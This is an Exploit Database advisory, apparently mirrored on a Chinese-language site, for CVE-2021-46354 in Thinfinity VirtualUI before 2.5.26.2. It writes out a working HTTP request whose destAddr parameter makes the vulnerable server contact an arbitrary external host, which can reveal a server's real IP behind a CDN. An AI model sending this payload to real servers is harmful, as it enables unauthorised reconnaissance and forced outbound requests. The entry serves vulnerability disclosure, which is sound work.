Thinfinity VirtualUI 2.5.26.2 – Information Disclosure

• Exploit Database
• 15 阅读

• 作者： Daniel Morales
  日期： 2022-02-21
• 类别：

  • webapps
  平台：

  • multiple
• 来源：https://www.exploit-db.com/exploits/50771/

• Exploit Title: Thinfinity VirtualUI2.5.26.2 - Information Disclosure
  Date: 18/01/2022
  Exploit Author: Daniel Morales
  Vendor: https://www.cybelesoft.com <https://www.cybelesoft.com/>
  Software Link: https://www.cybelesoft.com/thinfinity/virtualui/ <https://www.cybelesoft.com/thinfinity/virtualui/>
  Version vulnerable: Thinfinity VirtualUI < v2.5.26.2
  Tested on: Microsoft Windows
  CVE: CVE-2021-46354
  
  How it works
  External service interaction arises when it is possible to induce an application to interact with an arbitrary external service. The ability to send requests to other systems can allow the vulnerable server to filtrate the real IP of the webserver or increase the attack surface (it may be used also to filtrate the real IP behind a CDN).
  
  Payload
  An example of the HTTP request "https://example.com/cmd <https://example.com/cmd>?
  cmd=connect&wscompression=true&destAddr=domain.com <http://domain.com/>
  &scraper=fmx&screenWidth=1918&screenHeight=934&fitmode=0&argumentsp=&orientation=0&browserWidth=191
  8&browserHeight=872&supportCur=true&id=null&devicePixelRatio=1&isMobile=false&isLandscape=true&supp
  ortsFullScreen=true&webapp=false” 
  
  Where "domain.com <http://domain.com/>" is the external endpoint to be requested.
  
  Vulnerable versions
  It has been tested in VirtualUI version 2.1.28.0, 2.1.32.1 and 2.5.26.2
  
  References
  https://github.com/cybelesoft/virtualui/issues/3 <https://github.com/cybelesoft/virtualui/issues/3>
  https://www.tenable.com/cve/CVE-2021-46354 <https://www.tenable.com/cve/CVE-2021-46354>
  https://twitter.com/danielmofer <https://twitter.com/danielmofer>